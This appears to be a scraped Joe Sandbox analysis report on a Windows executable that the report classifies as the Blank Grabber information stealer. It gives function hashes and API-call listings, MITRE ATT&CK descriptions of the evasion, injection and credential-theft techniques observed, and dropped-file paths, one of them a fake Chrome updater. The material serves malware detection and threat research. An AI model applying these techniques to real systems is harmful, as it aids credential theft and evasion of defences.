Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction ID: 5c23d59cb5a3f8bd74177d34e0005229ddf34829e311af4bf283f35e755ecf11
Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction Fuzzy Hash: 7011C161A08B8181FA208B26A404169A361FB44BF8F980375EE7D8B7EACFBCD0518740

Function 00007FF6929881BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF692988039), ref: 00007FF6929881DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF692988039), ref: 00007FF6929881F5

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction ID: 16640f9f11f6bb117b47a8227717038e0126f95518bab3cb8a57223f6188e53d
Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction Fuzzy Hash: A4018E2291C65586F7608B16E41123EB3A0FB81BB9F600275EAAD815E9DFBDD410CB10

Function 00007FF69298B00C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B022
GetLastError.KERNEL32(?,?,?,00007FF692993492,?,?,?,00007FF6929934CF,?,?,00000000,00007FF692993995,?,?,00000000,00007FF6929938C7), ref: 00007FF69298B02C

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction ID: 6dbf77fb822001bab1599a83fc6c4fa39d99d28daa39a6ec24fa4516f5546657
Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction Fuzzy Hash: A0E08614F0920246FF349BB354550381391EF8475DF4844B4C81ECA257DEAC68994610

Function 00007FF6929887A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF6929887AC
GetLastError.KERNEL32 ref: 00007FF6929887B6

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction ID: d17d04e626f0461ba2a4edefa41978055c96a0ba1c5245e13b93c80848b15b5e
Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction Fuzzy Hash: 44D0C914E1950785F6346777185917913A1FF55B39F5406B4C02EC21D2DEACA0590161

Function 00007FF6929783F0 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction ID: 8fed72e2aa43369ed9c49f23aca21457d719b99e13d65a4a2789d8db8840fa97
Opcode Fuzzy Hash: bdc813d071ebcfd580e26e39c2a5fdf0ab8f113e1ff0d9792b57e541ecf83804
Instruction Fuzzy Hash: C441A216E1CA8581FA319B29D5152FD2364FBA574CF44A272DF8D82193EFA8E1D8D340

Function 00007FF6929782C0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF69297836A

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: b5ba3a7bdd6f81a08fecbc5f0608456278931d2be0cec5afaef281c9482569b9
Instruction ID: 7bb1adcaeb617ebcfe046c6fdae2422bf01f90afd6f607b5b24b1c35440c67b5
Opcode Fuzzy Hash: b5ba3a7bdd6f81a08fecbc5f0608456278931d2be0cec5afaef281c9482569b9
Instruction Fuzzy Hash: 4421D621B0925245FA709B17A8043BAA755FF45BCCF8C5470EE0D8B787DEBDE401D240

Function 00007FF69298BFFC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69298C082

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: a272c684b9e82b0f6d5b5ea7b632cf799a6e84b33c7975b6586671660882a7e4
Instruction ID: 5cc74a2ee8c278d52741bcbe1ce84113e17f50a820c0f8f658c05bf79cde97ee
Opcode Fuzzy Hash: a272c684b9e82b0f6d5b5ea7b632cf799a6e84b33c7975b6586671660882a7e4
Instruction Fuzzy Hash: 7A31A122A1870285FB65AF57C84177827A0EF44B99F4901B5EA1C8B3D3CEFCE8458711

Function 00007FF692989FF1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF69298A01F

Part of subcall function 00007FF69298A118: GetModuleHandleExW.KERNEL32 ref: 00007FF69298A13D
Part of subcall function 00007FF69298A118: GetProcAddress.KERNEL32 ref: 00007FF69298A153
Part of subcall function 00007FF69298A118: FreeLibrary.KERNEL32 ref: 00007FF69298A17A

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction ID: d17f9b87bdfeb7a838159d28bdd668df3178b81a1dcec34189a6ec26a2fe9366
Opcode Fuzzy Hash: 0855724a644142b9d5d18c3619865a8123e2457de56b2178a4ec6799866f0427
Instruction Fuzzy Hash: C1217A72A047468EFB248F65C4402BC37A0EB0971CF58067AD62D86AC6DFB8D584CB50

Function 00007FF69298F258 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF69298BAA6,?,?,?,00007FF69298AC67,?,?,00000000,00007FF69298AF02), ref: 00007FF69298F2AD

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction ID: 9d7654f6ee1d84e2693d2a44c1ef1d92c1469b287a76a58535ebd69434630d83
Opcode Fuzzy Hash: ad72610c1691118a78623675ffb4602911f8d1a0a6f53dbf3f5690a0bb35320a
Instruction Fuzzy Hash: C7F0901DB0960791FE7497A394613B91391DF4AB48F8C64B0CD0ECA3C3DEDCE4808691

Function 00007FF69298DCBC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF692980E24,?,?,?,00007FF692982336,?,?,?,?,?,00007FF692983929), ref: 00007FF69298DCFA

Memory Dump Source

Source File: 00000005.00000002.1757199362.00007FF692971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF692970000, based on PE: true

Associated: 00000005.00000002.1757150481.00007FF692970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757334507.00007FF69299B000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929AE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757395732.00007FF6929B0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000005.00000002.1757780840.00007FF6929B2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff692970000_hacn.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction ID: 42d66207ab999c9afd7843d2a678339b4d9db0dd1f498d79eb03012fcdfd5b43
Opcode Fuzzy Hash: 7e0b1927fbdc3a6ed72285cdcbe6a9dc307cd073e663e3b2fd931ce122d4be7c
Instruction Fuzzy Hash: 87F0FE14B092465AFE74667398516755390DF957ACF0C46B0DD2ECD6C3EEDCE840C560

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report VaTlw2kNGc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Blank Grabber

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\21b1a557fd31cc

Windows Analysis Report
VaTlw2kNGc.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
